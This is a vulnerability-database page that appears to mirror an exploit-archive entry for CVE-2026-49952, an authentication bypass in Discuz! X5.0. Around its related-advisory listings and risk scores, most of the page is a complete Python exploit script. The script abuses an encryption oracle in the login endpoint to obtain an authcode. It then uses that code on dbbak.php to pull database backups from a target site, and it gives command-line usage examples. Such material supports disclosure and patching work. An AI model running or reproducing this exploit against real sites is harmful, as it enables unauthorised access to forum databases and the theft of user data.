Lucene search
K

πŸ“„ Discuz! X5.0 Authentication Bypass

πŸ—“οΈΒ 07 Jul 2026Β 00:00:00Reported byΒ Mohammed Idrees BanyamerTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstorm.newsπŸ‘Β 6Β Views

Discuz! X5.0 has an authentication bypass via dbbak.php using UC_KEY; tokens can be reused.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-49952
17 Jun 202609:04
–githubexploit
Circl
CVE-2026-49952
15 Jun 202620:20
–circl
CVE
CVE-2026-49952
15 Jun 202618:43
–cve
Cvelist
CVE-2026-49952 Discuz! X5.0 Authentication Bypass via dbbak.php Encryption Oracle
15 Jun 202618:43
–cvelist
Exploit DB
Discuz! X5.0 - Authentication Bypass
7 Jul 202600:00
–exploitdb
EUVD
EUVD-2026-36792
15 Jun 202621:30
–euvd
NVD
CVE-2026-49952
15 Jun 202620:16
–nvd
Positive Technologies
PT-2026-49307
15 Jun 202600:00
–ptsecurity
Vulnrichment
CVE-2026-49952 Discuz! X5.0 Authentication Bypass via dbbak.php Encryption Oracle
15 Jun 202618:43
–vulnrichment
# Exploit Title:     Discuz! X5.0 - Authentication Bypass
    # CVE:                  CVE-2026-49952
    # Date:                 2026-06-26
    # Exploit Author:       Mohammed Idrees Banyamer
    # Author Country:       Jordan
    # Instagram:            @banyamer_security
    # Author GitHub:        https://github.com/mbanyamer
    # Author Blog  :        https://banyamersecurity.com/blog/
    # Vendor Homepage:      https://www.discuz.vip
    # Software Link:        https://www.discuz.vip
    # Affected:             Discuz! X5.0 (20260320 - 20260501)
    # Tested on:            Discuz! X5.0
    # Category:             WebApps
    # Platform:             PHP
    # Exploit Type:         Authentication Bypass
    # CVSS:                 9.1
    # Description:          Discuz! X5.0 suffers from an authentication bypass vulnerability via dbbak.php using UC_KEY encryption oracle allowing token reuse.
    # Fixed in:             20260510+
    # Usage:
    #   python3 exploit.py <target>
    #
    # Examples:
    #   python3 exploit.py http://target.com
    #   python3 exploit.py https://target.com --proxy http://127.0.0.1:8080
    #
    # Options:
    #   --proxy   HTTP proxy
    #
    # Notes:
    #   β€’ Tune payload if needed (e.g. admin|1|0|0)
    #
    # How to Use
    #
    # Step 1:
    #   Run the script against the target
    #
    # Step 2:
    #   Check if dbbak.php access is granted
    
    import requests
    import re
    import sys
    import argparse
    import urllib.parse
    from urllib3.exceptions import InsecureRequestWarning
    
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
    def banner():
        print(r"""
    β•”β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•—
    β•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘
    β•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
    β•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β•šβ–ˆβ–ˆβ•”β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
    β•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
    β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•β•   β•šβ•β•   β•šβ•β•  β•šβ•β•β•šβ•β•     β•šβ•β•β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•
            ╔═╗ Banyamer Security ╔═╗
    """)
    
    def get_authcode(target, payload, proxy):
        url = f"{target}/member.php?mod=logging&action=login&lssubmit=yes"
        data = {
            "username": payload,
            "password": "dummy123",
            "loginsubmit": "yes"
        }
        proxies = {"http": proxy, "https": proxy} if proxy else None
        try:
            r = requests.post(url, data=data, proxies=proxies, verify=False, allow_redirects=False, timeout=15)
            match = re.search(r'authcode=([a-zA-Z0-9]{20,})', r.text)
            if match:
                return match.group(1)
            match = re.search(r'([a-zA-Z0-9]{32,60})', r.text)
            if match:
                return match.group(1)
            return None
        except:
            return None
    
    def exploit_dbbak(target, authcode, proxy):
        url = f"{target}/api/db/dbbak.php?code={urllib.parse.quote(authcode)}&operation=backup&appid=1"
        proxies = {"http": proxy, "https": proxy} if proxy else None
        try:
            r = requests.get(url, proxies=proxies, verify=False, timeout=15)
            print(f"[+] dbbak.php status: {r.status_code}")
            if r.status_code == 200:
                print("[+] Success! Access to database backup granted.")
                print(r.text[:400])
            else:
                print("[-] Failed or access denied.")
        except:
            print("[-] Request failed.")
    
    def main():
        banner()
        parser = argparse.ArgumentParser(description="Discuz! X5.0 CVE-2026-49952 PoC")
        parser.add_argument("target", help="Target URL")
        parser.add_argument("--proxy", help="HTTP proxy", default=None)
        parser.add_argument("--payload", help="Oracle payload", default="admin|1|0|0")
        args = parser.parse_args()
        target = args.target.rstrip("/")
        print(f"[*] Target: {target}")
        print(f"[*] Payload: {args.payload}")
        authcode = get_authcode(target, args.payload, args.proxy)
        if authcode:
            print(f"[+] Authcode: {authcode}")
            exploit_dbbak(target, authcode, args.proxy)
        else:
            print("[-] Failed to get authcode.")
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.1
CVSS 49.3
EPSS0.0046
SSVC
6